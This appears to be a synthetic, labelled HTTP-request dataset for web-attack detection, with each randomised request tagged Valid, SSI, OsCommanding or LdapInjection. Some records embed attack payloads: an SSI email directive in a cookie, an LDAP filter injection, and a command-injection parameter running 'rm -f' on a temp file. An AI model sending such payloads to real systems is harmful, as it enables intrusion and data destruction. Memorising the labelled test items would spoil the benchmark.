Content-Language: dOnmu,9
Content-Encoding: compress
Content-Location: /rtenri/epReTAo/m7eeni.asp
Content-MD5: b3J0VGxvdHVsbGVzc2N0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Apr 05 04:41:19 UTC
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 49.146.80.204
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, iso-8859-9;q=0.0
Accept-Encoding: gzip;q=0.4, identity;q=0.8, compress
Accept-Language: ehecdnm-tam;q=0.3, hgy7ytou-taglFrht, rnmoyi-n;q=0.8
Cache-Control: max-age=2
Client-ip: 162.232.160.26
Cookie: Ht=ltDhinput%iechoEecuelae kr;qen7caoteto=dsyigceew;;beilqsal0ui=42684;lmlXS0al=b;PYM63betweenN3dP=2717525
Cookie2: $Version="1"
Date: Sat, 08 Mar 08 09:26:39 UTC
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Wed, 28 Jan 04 18:59:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: Digest uri=/uxGnm/snyrno/himrt.css
Range: 21-,49196-
Referer: http://www.dAscaOhh.org/atAe/xenngt.php
TE: deflate;q=0.5,gzip;q=0.1
Trailer: Accept
User-Agent: smgu/9.0
UA-CPU: PowerPC
UA-Disp: 6303,0091,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~

eSlNhe=itfp)( |    (hots=*)&kc8oiuaokC0n=7893&Ttrator=574341&ttoLuo1a8ioss=hvtce&Sg3cmaxpnleeen=47215539

End - Id: 36933
Start - Id: 39152
class: SSI
GET /adnNtidgjltnu4nmdw/ykF_BLn17DpaQ1Ps-0/dlOeseaumTeEiaame/e3d326b@A3/jCBkQzE.dKFs.pl?lb=tt&ih5kwehnirhbSs=cNaain&s2rnoat=iVEf&2geNffdkfhtaodz=eiseniroslbxhP&e9phjMa9=netcatas%7CvfDircds0dperl%7Cvl&f2Ey-V@VmetakO3=%26ivare&acrCr=cfi3ynh7sytno&gsnsai=tCD1eo2dp6y&wcCaek=wsid4 HTTP/1.0
Host: 165.1.16.67:80
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: macintosh;q=0.3, us-ascii, windows-1255;q=0.9
Accept-Encoding: *
Accept-Language: eaaogT-lr;q=0.4, utat11-mdr;q=0.5
Cache-Control: no-transform
Client-ip: 178.131.219.82
Cookie: nxtoesxa3tses=uiyu ;nOirpeHh=t;evalWptTcmdllv=<!--#email fromhost="www.bir4D0mo.com" tohost="mailbox.9uia.com" message="atar9 bitpl3 i08isL yee" fromaddress="e3rio.com" toaddress="Me5eh.htts.com" subject="dea" sender="of.com" replyto="osreb9.com" cc="eev" inreplyto="gd pni lhfH" id="sRmail" -->;a8tsSa=tl>v;wltnxrns=Untl
Cookie2: $Version="117"
Date: Fri, 07 May 04 11:30:54 GMT
ETag: "27uvsJ.8@S2QA1NSd"
Expect: 5rrdSb
From: ectdj@6rt19rcai.com
If-Modified-Since: Mon, 19 Jan 09 04:03:04 GMT
If-Unmodified-Since: Thu, 13 Jul 06 01:38:53 GMT
If-Match: "f7o-s6x@hw0WcOqe_-vW"
If-None-Match: "hD7AuL5JPb2ECW3shw"
If-Range: Wed, 24 Oct 07 06:34:06 UTC
Max-Forwards: 2
Pragma: no-cache
Proxy-Authorization: 0vsnrs eehysnd=1fiFjer
Authorization: NTLM aDVtcmhocGEyUGx0aEExZTZwZWFoMmNqY3Zob2F0ZHRnSlk=
Range: -0
Referer: http://www.Us2ehjE6.it/onirp5/Natwl4d.nsf
TE: trailers,trailers,gzip
Trailer: From
User-Agent: Mozilla/1.4 (Windows; U; WinNT 1.8; t6-Ei; rv:9.7.2) Gecko/01294092
UA-CPU: x86
UA-Disp: 016,7068,8
UA-OS: Solaris
UA-Pixels: 308x434
Via: 8.0 www.zsSqO.gif:582
Transfer-Encoding: compress
Upgrade: eeey/9.3
Warning: 430 218.56.203.53 "ebsaieatngcc1Ede" 
X-Forwarded-For: 83.220.235.130
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39152
Start - Id: 32066
class: Valid
GET /uXs5t/usEyiwescor/jQQhxlxRoZpFspA/eEUWe8_r/rZapvrQTZ0A0yE9ZVL/4k/ij7oXvcS/Ywp-6LoBMra_Y/MlAJQ21iTF.js? HTTP/1.0
Host: www.achnprea.biz:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 83.23.198.140
Cookie: k38e=up7BR_5fJ7;qNi=kb;VD-pELwdHs33=hat;thhizwrehsctrn=0489475
Cookie2: $Version="7"
Date: Thu, 10 Jan 08 20:32:15 CET
ETag: "1QRsTxtOxSuQq9KfJ"
Expect: 100-continue
From: hGao@Hawa.uk
If-Modified-Since: Wed, 23 Mar 05 19:48:41 GMT
If-Unmodified-Since: Fri, 29 Feb 08 21:03:54 GMT
If-Match: "iVqHBxgHhoqdC3s"
If-None-Match: "pLZIK3cUxESo3gtiG5"
If-Range: *
Max-Forwards: 801
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 4pmriH i9awgwm=0r0g
Range: 81-,-8,-69673
Referer: /eeneieet/emhN.exe
TE: deflate;q=0.6,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 8.4; al-li; rv:2.0.2) Gecko/99823491
UA-CPU: MIPS
UA-Disp: 342,5429,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8495x114
Via: 9.4 www.wk79hs.tiff, 7.6 www.6dhli.tiff
Transfer-Encoding: deflate
Upgrade: boli/1.4, iew/6.5, uoh/6.1
Warning: 167 94.137.101.249 "sidalepniti" "Sat, 29 Oct 05 02:08:38 GMT"
X-Forwarded-For: 62.83.138.43
X-Serial-Number: 2637635307
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32066
Start - Id: 28653
class: Valid
GET /XJXcmd33oYz-_@@L/cNnvwui/a2o2f3/na/ht2WpYfkQ60/6servicesJpassthruYRd/SNtj/4dXjTIlVk/er/mj9os/FB7H.shtml?vea=3435&sthh6eaeeEndqp=Iu&da6nrerqlbho=admine&tqramsLAednaer=4319709&um=tqmel2qa0nn&rmplebMm8ke9doE=35419024&Hopf8K0XI=428641&TsamwuL=Nterd8swc41us&n4y9eiN=5ssincludee8b5nooe34Klunion&nshnotnt=-hOicm4yge&xc6shutdowngTi68=iaEtanedE1d6Tnth&7eers7pRr=n3kh&Orna=3 HTTP/1.0
Host: 125.9.231.2
Connection: ththIw2r
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip
Accept-Language: be4ael-it;q=0.7, ie3ogfy-Amss
Cache-Control: max-stale=5081
Client-ip: 255.113.218.101
Cookie: S2dlash4oieel=unionty4hrt
Cookie2: $Version="2"
Date: Sat, 28 Feb 09 19:30:07 CET
ETag: "sobdAmaiQcdIoFx9@ju"
Expect: eugrer
From: tosers@epppo9rd.biz
If-Modified-Since: Sat, 21 Feb 04 10:31:34 CET
If-Unmodified-Since: Sat, 12 Feb 05 24:34:37 UTC
If-Match: "vRw_O@AgYwe.vuJ"
If-None-Match: *
If-Range: Thu, 19 Jun 08 10:30:07 GMT
Max-Forwards: 248
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest response="EAedb1b32Dc3382D2AdE19cFCab7Ee47"
Authorization: Basic c2l0ZHpvY3Q6Z3RuVzc=
Range: 1908-
Referer: /g8qwipae/vitehc.ace
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.6 (compatible; Konqueror/2.8; Unix; ixrlooti)
UA-CPU: 68000
UA-Disp: 670,5224,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9872x6402
Via: 2.9 www.jqnieoa.tiff, 9.5 www.Ed3l1erx.htm, HTTP/4.4 78.236.85.238
Transfer-Encoding: deflate
Upgrade: tsSmni/9.1
Warning: 948 www.euur0.tiff "0MagIcee" "Thu, 06 Mar 08 05:17:51 UTC"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6125410467694
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28653
Start - Id: 12572
class: Valid
GET /ekjKP.-N1w60QX/lBl1kdLE0DLkaL3LLd/sgZgdXHrmga9k2rFe/GetcacceptiI.aspx?hlWvwlvhfp=r1Oe&pieorhzrte=76&tud4ulf6=1452&Vtirsisst=j+f+hetc%40Ld6&rlxddmd=snh3aeuzreeikswoU6&PkpHiaccept=2887968&34rozqhtpass7Rbaccept=RRHo-rnr&oir=thRtTbnOCwVc&h1aadoha72mnaO=1p7&t1taesnv=oenhDtkystyleilsa&rpC=fNt&yiwttrep1rhaa=r5hiGbI_&hiO6lOtrycjv=r1er2hmOeha&ei4wepiaovotne=tjw7Tp&gzaaeeruei=oese+ct%27n HTTP/1.0
Host: 52.12.192.13
Connection: keep-alive
Accept: application/*, audio/*;q=0.2
Accept-Charset: x-mac-roman;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 250.98.12.167
Cookie: va=eSbing;ytorteer7enalau=(po
Cookie2: $Version="1"
Date: Wed, 01 Apr 09 11:37:04 GMT
ETag: W/"yrlDJs1oar.qn35"
Expect: 100-continue
From: cOcie@dtseq.net
If-Modified-Since: Wed, 13 Feb 08 20:31:09 UTC
If-Unmodified-Since: Wed, 06 Jun 07 07:00:41 CET
If-Match: "SvhSwG86WiMxCcKQX"
If-None-Match: "1kZVnnRA8Ss57YhTb6H3"
If-Range: Sun, 20 Apr 08 17:43:54 UTC
Max-Forwards: 019
MIME-Version: 4.9
Pragma: eclz=es6scHH9
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: Digest uri=http://eApE88rn.net/pjfhealo/4eCeupA0/ynese.jsp
Range: 941-,7-5
Referer: /an7y/a8btck/rrhheaoh/44lo.tar.gz
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.1 (Windows; U; Win98 3.2; hd-es; rv:1.3.5) Gecko/47911530
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 366x415
Via: 7.9 60.152.115.181, FTP/7.6 205.54.25.177, 2.9 www.tamgetr.png
Transfer-Encoding: gzip
Upgrade: rls/0.5, mx3atf/0.8, reyvel/3.5, iaelo/7.5
Warning: 299 www.sebroiht.htm "eaob" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12572
Start - Id: 27834
class: Valid
GET /BVo0QJ/8itn/cplrn176fsuqrn/giDnsrtsnt5sLrhl/cCSy-1xF4eV/nA1y6opO_ffn/l0lTlssidqaqxjxsz/mc3hrKhc/aYC2xcz7MRJD/lpNWg/dnZzCchLK2pA6kIDvKyz.htm?eiN=36position&was=ecfnwnol&ssmeMGtr9trbbo=q6iUehr&formzxtermQphpinput-zXtdL=12 HTTP/1.0
Host: www.ioihtrt.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: rehetgey='rwrph'
Client-ip: 102.45.50.188
Cookie: emaDniitaf=6415
Cookie2: $Version="5"
Date: Fri, 19 Sep 08 02:23:56 UTC
ETag: "T7R-PajXniYdaIVIMa"
Expect: 100-continue
From: xalea@r7nedo.fr
If-Modified-Since: Mon, 26 Jan 09 08:16:23 GMT
If-Unmodified-Since: Thu, 14 Feb 08 14:13:28 UTC
If-Match: *
If-None-Match: "NWzEOx6J2frU.S6y"
If-Range: "UT4_vaz4ktikU7O"
Max-Forwards: 6
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest nc=aaCdfA47
Authorization: Basic ZmxyYW46dHIyYTB3
Range: -858224
Referer: /raeia/rdtane.msf
TE: gzip,trailers,chunked;q=0.5
Trailer: Range
User-Agent: 2yjZId.FW http://www.otMhf.uk
UA-CPU: x86
UA-Disp: 911,0247,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 277x778
Via: FTP/0.6 0.92.252.201:7, 5.7 www.crjuut.gif:6967
Transfer-Encoding: compress
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 92325368257
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27834
Start - Id: 12063
class: Valid
GET /ZaorodASovho/wRlB./szgMOpPHayepL1/fwvcBJ2T9/areugeElclun/Y5BEK8l5winnt/tSR3fooo2r/otlnaleigh9h8ot/4ypoln/ixI4P3y4eN0RD.js?lxe8t=%2FN&yulikegC=nhoUgymon&igdmorrq1wulg=ejX&tinrio=39690&Ttqpnerbcr=fd&3eouddoailucsa=lPUKq4TK-VJk&eshhitsljg=isopen3+-like&iigroup bynull9uS0w2bgsound=gX2l4GJ&hail6HNsatt=33343126&select3ML0k7FryHU=script++aexecHeupassthru2%3E%3Dwns%40bl&feeO=7547&Ycznhyeatro=tke+&eey=2887004 HTTP/1.1
Host: 222.3.217.223
Connection: keep-alive
Accept: video/mpeg, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.1, compress
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 95.52.67.108
Cookie: o1=enh
Cookie2: $Version="7"
Date: Mon, 22 Oct 07 15:18:51 GMT
ETag: "u_KgT.wUTCRofOk5@"
Expect: eaa2eh
From: rtnkngo@aonjNnns.biz
If-Modified-Since: Wed, 15 Mar 06 09:37:12 UTC
If-Unmodified-Since: Tue, 14 Jul 09 18:41:53 GMT
If-Match: "yU@_YB.Pgj_0-D43BUHO"
If-None-Match: *
If-Range: Sun, 02 Jul 06 05:21:04 UTC
Max-Forwards: 6
MIME-Version: 2.2
Pragma: yrn='e'
Proxy-Authorization: Digest nc=BD5B8C8A
Authorization: Digest nonce
Range: -274,88-913,-5553
Referer: /9avuebnd/wg6zi/Etilre9/camuatf/iIo2oyfE.nsf
TE: chunked;q=0.4,chunked;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/5.9 (X11; U; Open BSD i386 5.8; uj-mo; rv:9.4.2) Gecko/12048186
UA-CPU: 68000
UA-Disp: 859,2266,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 5.1 195.253.202.113, meecfo/0.0 www.zgoTCerr.htm
Transfer-Encoding: gzip
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 813 226.224.5.12 "nenDbioeTeurpj" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 21280
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12063
Start - Id: 43370
class: OsCommanding
GET /oi_CbBjgJEwPTvm/natedeswogCttrc/4RMHxPbgsoundlbdY/6no5G3bLzn79QqHH/5htrKan/eEY5CMFq3f4jEj9KO.8-/JCEbWZ0c-.cgi?onfasIm70rnres=eoHlSxNb&evwY6K9group by=21216403&VQscriptm5I=sdivcy2tadmin9dformogUe&epantsi=5Rnure&bselectVE=t+sgohtacces85%29oex&lpooqo=85&TnrjusorhJhv=rm++-f+++++%2Ftmp%2FdiHcib+%7C&dtafsemoe5=4856786009&p0dqcUrgzZ=i%40Brk&tDtt=oFeEp6tsi&ovminnn6sm=3978881&1ET9pleSmeectiM=ncmdze5optiIy+xteyd&5elimta=%5Co7iframe8%5B7tt&oyeces0epn=07073303 HTTP/1.0
Host: www.liaauosed.com:80
Connection: mrekyt
Accept: */*
Accept-Charset: shift_jis, cp-950, utf-8, x-mac-greek;q=0.9
Accept-Encoding: 
Accept-Language: doias2ta-0saeeo;q=0.1, hpWew5-oocihi, lAt-rq, tdg-cP
Cache-Control: no-store
Client-ip: 255.185.181.53
Cookie: amon7eFsvuuC=88;boErsvned=sew4ohnasa;oEcpfiosy=5;eEecbHo=aHig9rhnxe
Cookie2: $Version="002"
Date: Fri, 20 Jul 07 11:54:08 UTC
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: grhrm
From: xrca@p4bIo.st
If-Modified-Since: Thu, 29 Apr 04 21:49:04 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 21
MIME-Version: 2.7
Pragma: eecnay=useeirai
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://elat.org/ldteeote/Ha2etioI/egttesm9/ihysl/aeiagsz.msf
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 2.9; lt-To; rv:2.3.7) Gecko/24003626
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: 1.3 98.195.180.140, 8.5 www.asnnt.htm
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43370
Start - Id: 25902
class: Valid
GET /Rtsamu.swf? HTTP/1.1
Host: www.8jtvhr3an.gov
Connection: close
Accept: audio/basic, application/postscript;q=0.1
Accept-Charset: big5, windows-1255;q=0.1, ks_c_5601-1987, euc-tw;q=0.4, iso-8859-2
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: min-fresh=59
Client-ip: 202.169.172.83
Cookie: Thttpg5tj=7;bzDJQwhereEP=|ecopy;e1=00635
Cookie2: $Version="3"
Date: Sat, 12 Sep 09 23:30:57 CET
ETag: W/"mK.9piZAhN5fgEqj"
Expect: xiTecej=s1gaek;sexe2ms
From: 0tac@3snhtda7el.st
If-Modified-Since: Sat, 25 Nov 06 07:06:58 UTC
If-Unmodified-Since: Thu, 22 Mar 07 12:04:37 UTC
If-Match: "q2Dx-CA2QHYFajKy"
If-None-Match: *
If-Range: Tue, 16 Jan 07 10:29:11 CET
Max-Forwards: 3161
MIME-Version: 9.2
Pragma: atWspfes='krbjan'
Proxy-Authorization: NTLM dHN0ZXNvbmVpdGhzbWxhanJsSHBhZHBlbWhvaXdRdm9sMHNhYw==
Authorization: Basic ZTIzdDpvZWFpdA==
Range: 112-242,-6,0-
Referer: http://turomyam.org/ahhu/hanr/qiEis/ietpiiq.rar
TE: gzip,trailers,chunked;q=0.2
Trailer: Cache-Control
User-Agent: ootlbdHCyrFsE0r
UA-CPU: x86
UA-Disp: 291,6267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 069x973
Via: 7.0 www.idnrtb.png:92445, hmrew/4.5 www.ihbndlwr.gif, flre/5.1 12.147.254.205:689
Transfer-Encoding: deflate
Upgrade: ubOor/8.3, ofwchs/5.9, Euhsr/1.6, eto/9.5, S5x/4.0
Warning: 862 254.139.199.159 "hnptOgFo1IjtwesaTav" 
X-Forwarded-For: 11.41.211.10
X-Serial-Number: 1807971586692
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25902
Start - Id: 7778
class: Valid
PUT /qqbohnhhT8El/LincludezL-S/rhexecD.fyvbscriptDcmdiOurmC/71NY/ivN/4PRBgmhyVJXhaEgy.gif? HTTP/1.0
Content-Length: 150
Content-Language: d4reido,eirkrs
Content-Encoding: deflate
Content-Location: http://Ot4sco.org/a9ikt/hesiycze/tmen/eeeotpht/oee6cs.swf
Content-MD5: Umhpb3dheWlVbnJvYmZlRw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 13:08:33 UTC
Last-Modified: Sun, 16 Apr 06 05:19:42 GMT
Host: www.5Naawttu.ch
Connection: close
Accept: application/rtf
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: elu-edt;q=0.5
Cache-Control: no-cache
Client-ip: 81.110.201.3
Cookie: lcyci0le2d=itTiftpnullTa<rcp1set;thzatn7eseeedt9=ljJ1nF;e8BshutdownY4i=19YPayba0;ahT6i=e lor Hzts
Cookie2: $Version="432"
Date: Sun, 11 Jan 04 12:44:51 GMT
ETag: "fmrcIYw2d63LsDt"
Expect: 100-continue
From: oisdmr@eobueIsd.net
If-Modified-Since: Sat, 07 Feb 09 17:43:27 GMT
If-Unmodified-Since: Tue, 03 Apr 07 11:07:47 GMT
If-Match: "_2VxcUIvZPqItX3"
If-None-Match: *
If-Range: Tue, 05 Jan 10 09:51:47 CET
Max-Forwards: 6
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM bG1tZU51bnNkdFNhcjZlTGVuOHdjc2VmZHFub2hpZ2x1bW9pMGVmMGNMbm8=
Authorization: NTLM NG5rcGV0YTVyYWEwZW5sZGVkdHR0ZVBqN21SdXl5aWVzYXJoZXV0M2h6aUs4
Range: 4598-8936,-371,17567-96840
Referer: http://uaas.be/niaoT7aE/RwysnsAS/nvti7.gif
TE: trailers,gzip
Trailer: Range
User-Agent: rrnts3eli8ecavkfht
UA-CPU: StrongARM
UA-Disp: 761,954,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 669x1617
Via: 8.7 www.eaoht.html:35, 8.6 www.prtfa.css, 5.3 www.iuoe9eaq.css
Transfer-Encoding: identity
Upgrade: etdnet/8.2
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 103.217.94.43
X-Serial-Number: 446017
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

childU2FpassthruVXn=nilx&j4I7@r@Dek=e&sheitonnd=beehjwkhicltet3ore&ehjetsaax=tmTr&snirasileaCezf=window.openrl &aohmtl7=s5enpasep2ltmy&vraaieeewy=a1Tl

End - Id: 7778
Start - Id: 13348
class: Valid
GET /tTshaM/aeht/eohA/hhiqummialcmu/tORbt318/rJ03Rysev/IReval7Vo/hogletth/epbeo2dpoaomE0eaho/dMe2AIKN5GMM86qc8m/itYeoeDsre.gif?I9s_He=a0irorIraLacu&ds=+meeeystp HTTP/1.1
Host: 249.249.47.196
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-ce;q=0.8
Accept-Encoding: deflate, compress, gzip;q=0.6
Accept-Language: rU1r8s-oTmp
Cache-Control: el8eo='alch'
Client-ip: 42.70.218.26
Cookie: e0Scu=teeteeuTsaeqeeoeyg;uqd2Lem= includeo O;iCuEg=4;3lnaensd=ooc;reaonmuamt=rarooME;rGEVqimgEDop=Ustdin
Cookie2: $Version="30"
Date: Wed, 10 Feb 10 06:54:12 UTC
ETag: "htwtWnHtKtmMXHTq2Qe"
Expect: ieioeir=Edsrt
From: ete6rhto@Ettesg40.be
If-Modified-Since: Tue, 05 Oct 04 19:08:54 UTC
If-Unmodified-Since: Wed, 31 Oct 07 14:45:13 CET
If-Match: *
If-None-Match: "RaLxJEY@sr-eBEn3p."
If-Range: *
Max-Forwards: 154
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM dDNJdW9ubkVCZXJoMGNObW5heWVjMmlub25sZXB2ZGN0NWNsZnNO
Authorization: Digest nc=adea45e2
Range: 30510-65,097-,-5721
Referer: http://www.5ieYh.de/Hesr/ee6tzoc/3ionqdsx.mp3
TE: chunked;q=0.7,trailers
Trailer: Expect
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 1.2; ps-jb; rv:9.0.6) Gecko/53471593
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 643x366
Via: 1.7 233.223.149.143
Transfer-Encoding: compress
Upgrade: sdnNlu/3.0, lm9eS/0.7, 8706/7.7, 5ase/6.3
Warning: 350 www.YfEsvph.shtml "g1siOyhac" 
X-Forwarded-For: 11.178.147.8
X-Serial-Number: 581499383802447
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13348
Start - Id: 12548
class: Valid
GET /fahayn6rsadn/eEG/nqi4hsn2owh/iQ-7RQKbx3..sh?TUcnullD=bEI6&tscSuhsx=oa9&w2Usi=I&deOl=71485903&wnbnech=3806&rohehnsre8io6Ec=5QJbkjrF&me=15 HTTP/1.1
Host: www.netx.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: macintosh;q=0.3, iso-8859-4, x-mac-chinesetrad;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: aetfaA-p3itTtIa, r-ranuyhd;q=0.6, k6iddwn-sjderugI
Cache-Control: epo8ihia='ucaO'
Client-ip: 91.12.121.99
Cookie: cooa=ad7;ssaiafo=hHk@erTfe Ettlwhw+;Meunul=386820;nsworEhgaaem=54910501;tn=aLJ1vTM9l
Cookie2: $Version="568"
Date: Sat, 29 Apr 06 04:04:55 GMT
ETag: "4lKilmE9Ujh30q8CB2"
Expect: rsrehz
From: Prazsf@rlxeoeonc.fr
If-Modified-Since: Sat, 15 Jul 06 06:49:47 GMT
If-Unmodified-Since: Wed, 27 Aug 08 23:01:20 UTC
If-Match: "PYs41pM64REUIFAm"
If-None-Match: "miCvBkOYFbVgNvzVxc"
If-Range: Sun, 02 Nov 08 16:27:10 UTC
Max-Forwards: 518
MIME-Version: 8.2
Pragma: oo=trci
Proxy-Authorization: NTLM ZW55dG12ZWdzaXRvbXc2MHhyZXV0aXhlaG5kZEdvdGlyOGF0RXRlc0V3b3Rp
Authorization: tfsx a3denn=obapE
Range: 79521-822865,4-
Referer: /r8aa.shtml
TE: trailers,deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/0.2 (compatible; MSIE 8.8; Open BSD i586; siroi5Vp)
UA-CPU: PowerPC
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 366x415
Via: HTTP/4.4 86.134.233.147, 7.9 77.83.21.191
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 872 13.212.162.154 "ta6ltHmaRrsa5lteoJts" "Sun, 17 Aug 08 02:20:53 CET"
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12548
Start - Id: 37156
class: LdapInjection
GET /ez/oyuombaracn1omz/gA/GNOHPiz86lZa/NDwgAVXLP/yefTimnmsnkh/ia8esfnhgoorr.html?smmStk7ooap=i.xeMnz&yilfittci34ie1f=hLgz%29%28+%7C++++%28u6axy%3D*%29&gVgaFLRZ5=0658 HTTP/1.0
Host: www.tfemnt.uk
Connection: lgIiH
Accept: video/*
Accept-Charset: euc-kr, iso-2022-jp;q=0.2, iso-8859-9;q=0.0, macintosh;q=0.4, windows-1250
Accept-Encoding: *;q=0.2
Accept-Language: pof-hTuSoua;q=0.5
Cache-Control: no-store
Client-ip: 159.233.41.170
Cookie: 9erm6c4K@h2=vbscript bin;3mUteewEae06m=0848415;hte=hddsl0
Cookie2: $Version="25"
Date: Fri, 28 Oct 05 02:23:29 UTC
ETag: W/"tPQ1V2111a4tmCmWTe"
Expect: ltdttsO
From: tshrlW@hlaga0aBB1.de
If-Modified-Since: Sun, 10 Dec 06 23:22:38 GMT
If-Unmodified-Since: Thu, 04 Sep 08 02:11:04 CET
If-Match: "-tKkT@w0qHYwe4meEZFj"
If-None-Match: "vYThNU@fmW8EKJg"
If-Range: "0tws3ITxulaOK84XSM"
Max-Forwards: 278
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM SWhyYWEwZXJOR29UdG5pOGh3c3JhYWRyb2pvbkw1c2VycHU=
Authorization: reekt xebaTim=3oeser
Range: 183458-,10781-99705
Referer: http://www.s8loouLm.it/Tnttupu/d9o2up/8nwr/2lhuz.aspx
TE: trailers
Trailer: Connection
User-Agent: Mozilla/3.7 (Windows; U; Win 9x 6.8; 7m-cc; rv:8.9.4) Gecko/57832559
UA-CPU: 68000
UA-Disp: 303,353,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5776x2501
Via: 2.2 www.OodrIr.jpg
Transfer-Encoding: identity
Upgrade: tritan/6.0, s3Tsn/3.7, IThoi0/4.6
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 203.59.253.98
X-Serial-Number: 130460
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37156
Start - Id: 24716
class: Valid
